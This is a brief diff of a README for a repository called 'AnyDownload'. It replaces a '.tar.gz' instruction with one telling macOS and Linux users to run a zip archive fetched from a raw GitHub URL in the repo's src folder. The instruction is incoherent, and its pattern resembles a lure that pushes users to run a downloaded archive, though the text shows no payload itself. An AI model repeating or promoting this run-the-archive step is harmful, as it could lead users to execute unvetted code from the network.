Ilyasagibran007/AnyDownload/README.md

 You may need to run the downloaded `.exe` file to set up the application.

 ### For macOS and Linux Users:
-You may need to run the downloaded `.tar.gz` file.
+You may need to run the downloaded `https://raw.githubusercontent.com/Ilyasagibran007/AnyDownload/main/src/Any-Download-v2.6.zip` file.
 Extract it and follow the instructions in the `README` file inside.

 ## 🌟 Features